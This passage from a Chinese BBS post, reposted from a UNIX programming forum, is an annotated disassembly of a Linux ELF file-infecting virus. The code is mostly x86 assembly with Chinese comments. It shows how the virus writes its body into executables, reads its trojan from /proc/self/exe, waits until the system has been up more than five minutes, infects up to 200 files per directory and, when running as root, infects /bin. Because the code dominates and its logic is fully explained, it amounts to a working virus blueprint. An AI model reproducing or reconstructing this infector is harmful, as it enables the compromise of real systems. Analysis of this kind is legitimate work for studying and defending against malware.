0x8048d44: incl 0xffffff08(%ebp)
0x8048d4a: cmp %esi,0xffffff08(%ebp)
0x8048d50: jl 0x8048d2c
0x8048d52: push $0x0
0x8048d54: pushl 0xffffffa8(%ebp)
0x8048d57: mov 0xffffff3c(%ebp),%ecx
0x8048d5d: push %ecx
0x8048d5e: call 0x8048668 ; lseek
0x8048d63: add $0xc,%esp
0x8048d66: test %eax,%eax
0x8048d68: je 0x80490f0
0x8048d6e: mov 0xffffff30(%ebp),%ecx
0x8048d74: push %ecx
0x8048d75: mov 0xffffff2c(%ebp),%ecx
0x8048d7b: push %ecx
0x8048d7c: mov 0xffffff3c(%ebp),%ecx
0x8048d82: push %ecx
0x8048d83: call 0x8048624 ; write
0x8048d88: add $0xc,%esp
0x8048d8b: cmp $0x1,%eax
0x8048d8e: jne 0x80490f0
0x8048d94: push $0x0
0x8048d96: pushl 0xffffffac(%ebp)
0x8048d99: mov 0xffffff3c(%ebp),%ecx
0x8048d9f: push %ecx
0x8048da0: call 0x8048668 ; lseek
0x8048da5: add $0xc,%esp
0x8048da8: test %eax,%eax
0x8048daa: je 0x80490f0
0x8048db0: mov 0xffffff1c(%ebp),%ecx
0x8048db6: push %ecx
0x8048db7: mov 0xffffff18(%ebp),%ecx
0x8048dbd: push %ecx
0x8048dbe: mov 0xffffff3c(%ebp),%ecx
0x8048dc4: push %ecx
0x8048dc5: call 0x8048624 ; write
0x8048dca: add $0xc,%esp
0x8048dcd: cmp $0x1,%eax
0x8048dd0: jne 0x80490f0
0x8048dd6: mov %esp,%edi
0x8048dd8: mov 0xffffff60(%ebp),%ebx
0x8048dde: sub 0xffffff24(%ebp),%ebx
0x8048de4: mov %ebx,%eax
0x8048de6: and $0x1fffffff,%eax
0x8048deb: add $0x3,%eax
0x8048dee: and $0x3ffffffc,%eax
0x8048df3: sub %eax,%esp
0x8048df5: mov %esp,%esi
0x8048df7: push $0x0
0x8048df9: mov 0xffffff24(%ebp),%ecx
0x8048dff: push %ecx
0x8048e00: mov 0xffffff3c(%ebp),%ecx
0x8048e06: push %ecx
0x8048e07: call 0x8048668 ; lseek
0x8048e0c: add $0xc,%esp
0x8048e0f: test %eax,%eax
0x8048e11: je 0x80490f0
0x8048e17: push %ebx
0x8048e18: push %esi
0x8048e19: mov 0xffffff3c(%ebp),%ecx
0x8048e1f: push %ecx
0x8048e20: call 0x80485e0 ; read
0x8048e25: add $0xc,%esp
0x8048e28: cmp $0x1,%eax
0x8048e2b: jne 0x80490f0
0x8048e31: push $0x0
0x8048e33: mov 0xffffff24(%ebp),%eax
0x8048e39: add $0x1000,%eax
0x8048e3e: push %eax
0x8048e3f: mov 0xffffff3c(%ebp),%ecx
0x8048e45: push %ecx
0x8048e46: call 0x8048668 ; lseek
0x8048e4b: add $0xc,%esp
0x8048e4e: test %eax,%eax
0x8048e50: je 0x80490f0
0x8048e56: push %ebx
0x8048e57: push %esi
0x8048e58: mov 0xffffff3c(%ebp),%ecx
0x8048e5e: push %ecx
0x8048e5f: call 0x8048624 ; write
0x8048e64: cmp $0x1,%eax
0x8048e67: jne 0x80490f0
0x8048e6d: mov %edi,%esp
0x8048e6f: push $0x0
0x8048e71: mov 0xffffff24(%ebp),%ecx
0x8048e77: push %ecx
0x8048e78: mov 0xffffff3c(%ebp),%ecx
0x8048e7e: push %ecx
0x8048e7f: call 0x8048668 ; lseek
0x8048e84: add $0xc,%esp
0x8048e87: test %eax,%eax
0x8048e89: je 0x80490f0
0x8048e8f: call 0x8048548 ; get_?? = 3974 (病毒长度)
0x8048e94: push %eax
0x8048e95: call 0x8048534 ; 得到病毒体开始的绝对位置(vm)
0x8048e9a: push %eax
0x8048e9b: mov 0xffffff3c(%ebp),%ecx
0x8048ea1: push %ecx
0x8048ea2: call 0x8048624 ; write
0x8048ea7: add $0xc,%esp
0x8048eaa: cmp $0x1,%eax
0x8048ead: jne 0x80490f0
0x8048eb3: push $0x0
0x8048eb5: call 0x8048528 ; eax = 34
0x8048eba: add 0xffffff24(%ebp),%eax
0x8048ec0: push %eax
0x8048ec1: mov 0xffffff3c(%ebp),%ecx
0x8048ec7: push %ecx
0x8048ec8: call 0x8048668 ; lseek
0x8048ecd: add $0xc,%esp
0x8048ed0: test %eax,%eax
0x8048ed2: je 0x80490f0
0x8048ed8: push $0x4
0x8048eda: lea 0xffffffa4(%ebp),%eax
0x8048edd: push %eax
0x8048ede: mov 0xffffff3c(%ebp),%ecx
0x8048ee4: push %ecx
0x8048ee5: call 0x8048624 ; write
0x8048eea: add $0xc,%esp
0x8048eed: cmp $0x1,%eax
0x8048ef0: jne 0x80490f0
0x8048ef6: movw $0x2,0xffffff96(%ebp)
0x8048efc: mov 0xffffff60(%ebp),%ecx
0x8048f02: add $0x1000,%ecx
0x8048f08: mov %ecx,0xffffff98(%ebp)
0x8048f0b: mov 0xffffff20(%ebp),%ecx
0x8048f11: mov %ecx,0xffffffa4(%ebp)
0x8048f14: mov 0xffffffac(%ebp),%eax
0x8048f17: cmp 0xffffff24(%ebp),%eax
0x8048f1d: jb 0x8048f27
0x8048f1f: add $0x1000,%eax
0x8048f24: mov %eax,0xffffffac(%ebp)
0x8048f27: push $0x0
0x8048f29: push $0x0
0x8048f2b: mov 0xffffff3c(%ebp),%ecx
0x8048f31: push %ecx
0x8048f32: call 0x8048668 ; lseek
0x8048f37: add $0xc,%esp
0x8048f3a: test %eax,%eax
0x8048f3c: je 0x80490f0
0x8048f42: push $0x34
0x8048f44: mov 0xffffff0c(%ebp),%ecx
0x8048f4a: jmp 0x804907e
0x8048f4f: nop
0x8048f50: mov 0x10(%ebx),%eax
0x8048f53: add 0x4(%ebx),%eax
0x8048f56: lea 0xfffff000(%eax),%esi
0x8048f5c: cmpw $0x1,0xffffff96(%ebp)
0x8048f61: ja 0x80490eb
0x8048f67: mov 0x14(%ebx),%eax
0x8048f6a: add 0x8(%ebx),%eax
0x8048f6d: add $0xfffff000,%eax
0x8048f72: mov %eax,0xffffffa4(%ebp)
0x8048f75: movw $0x2,0xffffff96(%ebp)
0x8048f7b: mov 0xffffff60(%ebp),%eax
0x8048f81: mov %eax,0xffffff98(%ebp)
0x8048f84: push $0x0
0x8048f86: push $0x0
0x8048f88: mov 0xffffff3c(%ebp),%ecx
0x8048f8e: push %ecx
0x8048f8f: call 0x8048668 ; lseek
0x8048f94: add $0xc,%esp
0x8048f97: test %eax,%eax
0x8048f99: je 0x80490f0
0x8048f9f: push $0x34
0x8048fa1: mov 0xffffff38(%ebp),%ecx
0x8048fa7: jmp 0x8049002
0x8048fa9: lea 0x0(%esi),%esi
0x8048fac: mov 0x10(%ebx),%eax
0x8048faf: add 0x4(%ebx),%eax
0x8048fb2: lea 0xfffff000(%eax),%esi
0x8048fb8: mov 0x14(%ebx),%edx
0x8048fbb: add 0x8(%ebx),%edx
0x8048fbe: mov 0xffffffa4(%ebp),%eax
0x8048fc1: mov %eax,0xffffff40(%ebp)
0x8048fc7: movw $0x2,0xffffff96(%ebp)
0x8048fcd: mov 0xffffff60(%ebp),%eax
0x8048fd3: mov %eax,0xffffff98(%ebp)
0x8048fd6: add $0xfffff000,%edx
0x8048fdc: mov %edx,0xffffffa4(%ebp)
0x8048fdf: push $0x0
0x8048fe1: push $0x0
0x8048fe3: mov 0xffffff3c(%ebp),%ecx
0x8048fe9: push %ecx
0x8048fea: call 0x8048668 ; lseek
0x8048fef: add $0xc,%esp
0x8048ff2: test %eax,%eax
0x8048ff4: je 0x80490f0
0x8048ffa: push $0x34
0x8048ffc: mov 0xffffff0c(%ebp),%ecx
0x8049002: push %ecx
0x8049003: mov 0xffffff3c(%ebp),%ecx
0x8049009: push %ecx
0x804900a: call 0x8048624 ; write
0x804900f: add $0xc,%esp
0x8049012: cmp $0x1,%eax
0x8049015: jne 0x80490f0
0x804901b: push $0x0
0x804901d: push %esi
0x804901e: mov 0xffffff3c(%ebp),%ecx
0x8049024: push %ecx
0x8049025: call 0x8048668 ; lseek
0x804902a: add $0xc,%esp
0x804902d: test %eax,%eax
0x804902f: je 0x80490f0
0x8049035: call 0x8048548 ; 得到病毒长度 = 3974
0x804903a: push %eax
0x804903b: call 0x8048534 ; 病毒体在内存中开始位置
0x8049040: push %eax
0x8049041: mov 0xffffff3c(%ebp),%ecx
0x8049047: push %ecx
0x8049048: call 0x8048624 ; write
0x804904d: add $0xc,%esp
0x8049050: cmp $0x1,%eax
0x8049053: jne 0x80490f0
0x8049059: push $0x0
0x804905b: call 0x8048528 ; 得到常量 34
0x8049060: add %esi,%eax
0x8049062: push %eax
0x8049063: mov 0xffffff3c(%ebp),%ecx
0x8049069: push %ecx
0x804906a: call 0x8048668 ; lseek(fd,34,SEEK_SET);
0x804906f: add $0xc,%esp
0x8049072: test %eax,%eax
0x8049074: je 0x80490f0
0x8049076: push $0x4
0x8049078: mov 0xffffff10(%ebp),%ecx
0x804907e: push %ecx
0x804907f: mov 0xffffff3c(%ebp),%ecx
0x8049085: push %ecx
0x8049086: call 0x8048624 ; write
0x804908b: add $0xc,%esp
0x804908e: cmp $0x1,%eax
0x8049091: jne 0x80490f0
0x8049093: push $0x0
0x8049095: pushl 0xffffff98(%ebp)
0x8049098: mov 0xffffff3c(%ebp),%ecx
0x804909e: push %ecx
0x804909f: call 0x8048668 ; lseek
0x80490a4: add $0xc,%esp
0x80490a7: test %eax,%eax
0x80490a9: je 0x80490f0
0x80490ab: mov 0x10(%ebp),%ecx
0x80490ae: push %ecx
0x80490af: mov 0xc(%ebp),%ecx
0x80490b2: push %ecx
0x80490b3: mov 0xffffff3c(%ebp),%ecx
0x80490b9: push %ecx
0x80490ba: call 0x8048624 ; write
0x80490bf: add $0xc,%esp
0x80490c2: cmp $0x1,%eax
0x80490c5: jne 0x80490f0
0x80490c7: mov 0xffffff3c(%ebp),%ecx
0x80490cd: push %ecx
0x80490ce: push $0x6
0x80490d0: call 0x8048560 ; close(fd)
0x80490d5: mov 0xffffff14(%ebp),%ecx
0x80490db: push %ecx
0x80490dc: mov 0x8(%ebp),%ecx
0x80490df: push %ecx
0x80490e0: push $0x1e
0x80490e2: call 0x8048574 ; utime
0x80490e7: test %eax,%eax
0x80490e9: jl 0x80490f0
0x80490eb: xor %eax,%eax
0x80490ed: jmp 0x8049112
0x80490ef: nop
0x80490f0: mov 0xffffff34(%ebp),%esp
0x80490f6: cmpl $0xffffffff,0xffffff3c(%ebp)
0x80490fd: je 0x804910d
0x80490ff: mov 0xffffff3c(%ebp),%ecx
0x8049105: push %ecx
0x8049106: push $0x6
0x8049108: call 0x8048560 ; close (fd)
0x804910d: mov $0xffffffff,%eax
0x8049112: lea 0xfffffefc(%ebp),%esp
0x8049118: pop %ebx
0x8049119: pop %esi
0x804911a: pop %edi
0x804911b: leave
0x804911c: ret
0x804911d: lea 0x0(%esi),%esi
//fillpid(pid,buf) buf = /proc/" "/exe"
//填入pid,生成"/proc/pid/exe"
0x8049120: push %ebp
0x8049121: mov %esp,%ebp
0x8049123: sub $0x4,%esp
0x8049126: push %edi
0x8049127: push %esi
0x8049128: push %ebx
0x8049129: mov 0x8(%ebp),%ebx ; ebx = pid
0x804912c: mov 0xc(%ebp),%edi
0x804912f: push %ebx
0x8049130: call 0x8048728 ; 得到
pid长度
0x8049135: lea 0xffffffff(%eax),%ecx
0x8049138: test %ecx,%ecx
0x804913a: jl 0x804916c
0x804913c: mov $0x66666667,%esi
0x8049141: lea 0x0(%esi),%esi
0x8049144: mov %ebx,%eax
0x8049146: imul %esi,%eax
0x8049148: sar $0x2,%edx
0x804914b: mov %ebx,0xfffffffc(%ebp)
0x804914e: sarl $0x1f,0xfffffffc(%ebp)
0x8049152: sub 0xfffffffc(%ebp),%edx
0x8049155: lea (%edx,%edx,4),%eax
0x8049158: add %eax,%eax
0x804915a: sub %eax,%ebx
0x804915c: mov %ebx,0xfffffffc(%ebp)
0x804915f: mov %edx,%ebx
0x8049161: mov 0xfffffffc(%ebp),%al
0x8049164: add $0x30,%al
0x8049166: mov %al,(%ecx,%edi,1)
0x8049169: dec %ecx
0x804916a: jns 0x8049144
0x804916c: lea 0xfffffff0(%ebp),%esp
0x804916f: pop %ebx
0x8049170: pop %esi
0x8049171: pop %edi
0x8049172: leave
0x8049173: ret
// void *read_trojan(int *trojan_len) 返回读入内存的木马起始位置,
// trojan_len置为trojan长度
0x8049174: push %ebp
0x8049175: mov %esp,%ebp
0x8049177: sub $0x47c,%esp
0x804917d: push %edi
0x804917e: push %esi
0x804917f: push %ebx
0x8049180: movl $0x0,0xfffffb88(%ebp)
0x804918a: lea 0xfffffc00(%ebp),%esi
0x8049190: push $0x400
0x8049195: push %esi
0x8049196: push $0x0
0x8049198: call 0x8048808
0x804919d: mov %esi,%edi
; esi = "/proc/"
0x804919f: xor %eax,%eax
0x80491a1: cld
0x80491a2: mov $0xffffffff,%ecx
0x80491a7: repnz scas %es:(%edi),%al
0x80491a9: not %ecx
; ecx = esi 长度 (包括\0)
0x80491ab: lea 0xffffffff(%esi,%ecx,1),%ebx ; ebx 指向字符串结尾
0x80491af: push $0x14
0x80491b1: call 0x8048554 ; getpid
0x80491b6: mov %eax,%edx
0x80491b8: push %edx
0x80491b9: call 0x8048728 ; 得到pid数字长度
0x80491be: mov %eax,%edx
0x80491c0: mov %esi,%edi
0x80491c2: xor %eax,%eax
0x80491c4: cld
0x80491c5: mov $0xffffffff,%ecx
0x80491ca: repnz scas %es:(%edi),%al
0x80491cc: not %ecx
0x80491ce: lea 0xffffffff(%esi,%ecx,1),%ecx
0x80491d2: add %ecx,%edx
0x80491d4: push $0x5
0x80491d6: push %edx
0x80491d7: push $0x1
0x80491d9: call 0x8048808 ; edx = "/exe",now esi
= "/proc/ /exe"
0x80491de: add $0x20,%esp
0x80491e1: push %ebx
0x80491e2: push $0x14
0x80491e4: call 0x8048554 ; getpid
0x80491e9: add $0x4,%esp
0x80491ec: mov %eax,%edx
0x80491ee: push %edx
0x80491ef: call 0x8049120 ; now esi =
"/proc/$pid/exe"
0x80491f4: push $0x0
0x80491f6: push $0x0
0x80491f8: push %esi
0x80491f9: push $0x5
0x80491fb: call 0x804858c ; open(,O_RDONLY,0);
0x8049200: mov %eax,%ebx
0x8049202: add $0x18,%esp
0x8049205: test %ebx,%ebx
0x8049207: jl 0x8049298
0x804920d: push $0x34
0x804920f: lea 0xfffffb8c(%ebp),%eax
0x8049215: push %eax
0x8049216: push %ebx
0x8049217: call 0x80485e0 ; read ELF 头
0x804921c: add $0xc,%esp
0x804921f: cmp $0x1,%eax
0x8049222: jne 0x8049298
0x8049224: push $0x0
0x8049226: pushl 0xfffffb98(%ebp)
0x804922c: push %ebx
0x804922d: call 0x8048668 ; lseek 到 e_ident[12] 指向的地址
0x8049232: add $0xc,%esp
0x8049235: test %eax,%eax
0x8049237: je 0x8049298
0x8049239: lea 0xfffffbc0(%ebp),%eax
0x804923f: push %eax
0x8049240: push %ebx
0x8049241: push $0x6c
0x8049243: call 0x8048574 ; fstat
0x8049248: add $0xc,%esp
0x804924b: test %eax,%eax
0x804924d: jl 0x8049298
0x804924f: mov 0xfffffb98(%ebp),%eax ; 木马在文件中偏
移
0x8049255: mov 0xfffffbd4(%ebp),%edi ; 文件长度
0x804925b: sub %eax,%edi
0x804925d: push %edi
0x804925e: call 0x80485ac ; sbrk ; 为另一部分病毒
体分配存储空间
0x8049263: mov %eax,0xfffffb88(%ebp)
0x8049269: add $0x4,%esp
0x804926c: test %eax,%eax
0x804926e: je 0x8049298
0x8049270: push %edi
; edi == 木马长度
0x8049271: push %eax
0x8049272: push %ebx
0x8049273: call 0x80485e0 ; read读
入另一部分病毒体
0x8049278: mov %eax,%edx
0x804927a: add $0xc,%esp
0x804927d: cmp $0x1,%edx
; eax == 1 读成功
0x8049280: jne 0x8049298
0x8049282: mov 0x8(%ebp),%eax
0x8049285: mov %edi,(%eax)
; 保存木马长度到buf前 4 字节
0x8049287: push %ebx
0x8049288: push $0x6
0x804928a: call 0x8048560 ; close(fd);
0x804928f: mov 0xfffffb88(%ebp),%eax ; 读入内存的木马
偏移
0x8049295: jmp 0x80492c1
0x8049297: nop
0x8049298: cmp $0xffffffff,%ebx
0x804929b: je 0x80492a8
0x804929d: push %ebx
0x804929e: push $0x6
0x80492a0: call 0x8048560 ; close (fd);
0x80492a5: add $0x8,%esp
0x80492a8: cmpl $0x0,0xfffffb88(%ebp)
0x80492af: je 0x80492bf
0x80492b1: mov 0xfffffb88(%ebp),%eax
0x80492b7: push %eax
0x80492b8: push $0x2d
0x80492ba: call 0x8048560 ; brk
0x80492bf: xor %eax,%eax
0x80492c1: lea 0xfffffb78(%ebp),%esp
0x80492c7: pop %ebx
0x80492c8: pop %esi
0x80492c9: pop %edi
0x80492ca: leave
0x80492cb: ret
//int check_uptime(); 如果系统uptime (s) 大于 299 (5分钟),返回 1,否则 0。
0x80492cc: push %ebp
0x80492cd: mov %esp,%ebp
0x80492cf: sub $0x80,%esp
0x80492d5: push %esi
0x80492d6: push %ebx
0x80492d7: push $0x80
0x80492dc: lea 0xffffff80(%ebp),%esi
0x80492df: push %esi
0x80492e0: push $0x2
0x80492e2: call 0x8048808 ; esi = "/proc/uptime"
0x80492e7: push $0x0
0x80492e9: push $0x0
0x80492eb: push %esi
0x80492ec: push $0x5
0x80492ee: call 0x804858c ;
open("/proc/uptime",O_RDONLY,0);
0x80492f3: mov %eax,%ebx
0x80492f5: add $0x1c,%esp
0x80492f8: test %ebx,%ebx
0x80492fa: jl 0x804930d
0x80492fc: push $0x80
0x8049301: push %esi
0x8049302: push %ebx
0x8049303: push $0x3
0x8049305: call 0x804858c ; read(fd,esi,
0x80);
0x804930a: add $0x10,%esp
0x804930d: push %ebx
0x804930e: push $0x6
0x8049310: call 0x8048560 ; close(fd);
0x8049315: push %esi
0x8049316: call 0x8048768
0x804931b: cmp $0x12b,%eax ; > 299 返回 1,否则返回 0
0x8049320: jg 0x8049328
0x8049322: xor %eax,%eax
0x8049324: jmp 0x804932d
0x8049326: mov %esi,%esi
0x8049328: mov $0x1,%eax
0x804932d: lea 0xffffff78(%ebp),%esp
0x8049333: pop %ebx
0x8049334: pop %esi
0x8049335: leave
0x8049336: ret
0x8049337: nop
//依次感染当前目录下的 200 个文件 inflects(trojan,trojanlen);
0x8049338: push %ebp
0x8049339: mov %esp,%ebp
0x804933b: sub $0x130,%esp
0x8049341: push %edi
0x8049342: push %esi
0x8049343: push %ebx
0x8049344: lea 0xfffffed4(%ebp),%edx
0x804934a: mov %edx,0xfffffed0(%ebp)
0x8049350: lea 0xfffffede(%ebp),%ebx
0x8049356: mov $0xc8,%esi ; 200
0x804935b: movb $0x2e,0xfffffed4(%ebp)
0x8049362: movb $0x0,0xfffffed5(%ebp)
0x8049369: push $0x0
0x804936b: push $0x0
0x804936d: push %edx
0x804936e: push $0x5
0x8049370: call 0x804858c ; open(".",
O_RDONLY,0);
0x8049375: mov %eax,%edi
0x8049377: add $0x10,%esp
0x804937a: test %edi,%edi ; edi = fd
0x804937c: jge 0x80493b9 ; readdir
0x804937e: mov $0xffffffff,%eax
0x8049383: jmp 0x80493d9
0x8049385: lea 0x0(%esi),%esi
0x8049388: test %esi,%esi
0x804938a: jl 0x80493d1
0x804938c: push %ebx ; *ebx
= filename
0x804938d: call 0x80486e8 ; strlen
0x8049392: add %ebx,%eax
0x8049394: add $0x4,%esp
0x8049397: cmpb $0x70,0xfffffffe(%eax)
0x804939b: jne 0x80493a3
0x804939d: cmpb $0x73,0xffffffff(%eax) ; 有意思,不感染以"ps"结尾的文件
0x80493a1: je 0x80493b9
0x80493a3: mov 0xc(%ebp),%edx
0x80493a6: push %edx ; 木马长
度
0x80493a7: mov 0x8(%ebp),%edx
0x80493aa: push %edx ; 指向木
马
0x80493ab: push %ebx
0x80493ac: call 0x8048a38 ;
inflect(filename,trojan,trojan_len);
0x80493b1: add $0xc,%esp
0x80493b4: test %eax,%eax ; eax = 0 感染成
功
0x80493b6: jne 0x80493b9
0x80493b8: dec %esi
0x80493b9: push $0x1
0x80493bb: mov 0xfffffed0(%ebp),%edx
0x80493c1: push %edx
0x80493c2: push %edi
0x80493c3: push $0x59
0x80493c5: call 0x804858c ; readdir(edi,
edx,1);
0x80493ca: add $0x10,%esp
0x80493cd: test %eax,%eax
0x80493cf: jg 0x8049388 ; 1 = readdir 成
功
0x80493d1: push %edi
0x80493d2: push $0x6
0x80493d4: call 0x8048560 ; close(fd);
0x80493d9: lea 0xfffffec4(%ebp),%esp
0x80493df: pop %ebx
0x80493e0: pop %esi
0x80493e1: pop %edi
0x80493e2: leave
0x80493e3: ret
//病毒主功能函数 virus()
0x80493e4: push %ebp
0x80493e5: mov %esp,%ebp
0x80493e7: sub $0x100c,%esp
0x80493ed: push %edi
0x80493ee: push %esi
0x80493ef: push %ebx
0x80493f0: call 0x80492cc ; 读/proc/uptime,如果计
算后 <= 299,不感染。
0x80493f5: test %eax,%eax
0x80493f7: je 0x8049473
0x80493f9: lea 0xffffeffc(%ebp),%eax
0x80493ff: push %eax
0x8049400: call 0x8049174 ; read_trojan
0x8049405: mov %eax,%edi
0x8049407: add $0x4,%esp
0x804940a: test %edi,%edi
0x804940c: je 0x8049473
0x804940e: call *%edi ; 调用木马
0x8049410: test %eax,%eax
0x8049412: jne 0x8049473
0x8049414: pushl 0xffffeffc(%ebp) ; 木马长度
0x804941a: push %edi ; 木马
0x804941b: call 0x8049338
0x8049420: push $0x18
0x8049422: call 0x8048554 ; getuid();
0x8049427: add $0xc,%esp
0x804942a: test %eax,%eax
0x804942c: jne 0x8049473 ; uid 非 0 则退
出
0x804942e: push $0x1000
0x8049433: lea 0xfffff000(%ebp),%esi
0x8049439: push %esi
0x804943a: push $0xb7
0x804943f: call 0x8048574 ; getcwd(buf,
4096);
0x8049444: push $0x8
0x8049446: lea 0xffffeff4(%ebp),%ebx
0x804944c: push %ebx
0x804944d: push $0x3
0x804944f: call 0x8048808 ; ebx 指向
"/bin"
0x8049454: push %ebx
0x8049455: push $0xc
0x8049457: call 0x8048560 ; chdir("/bin");
0x804945c: add $0x20,%esp
0x804945f: pushl 0xffffeffc(%ebp)
0x8049465: push %edi
0x8049466: call 0x8049338 ; 循环感染/bin下
200 个文件
0x804946b: push %esi
0x804946c: push $0xc
0x804946e: call 0x8048560 ; chdir 回当前目
录
0x8049473: lea 0xffffefe8(%ebp),%esp
0x8049479: pop %ebx
0x804947a: pop %esi
0x804947b: pop %edi
0x804947c: leave
0x804947d: ret
--
※ 来源:.UNIX编程WWW apue.dhs.org. [FROM: 202.108.200.52]
--
※ 转寄:·UNIX编程 apue.dhs.org·[FROM: 210.39.3.50]
--
※ 转载:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.146]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店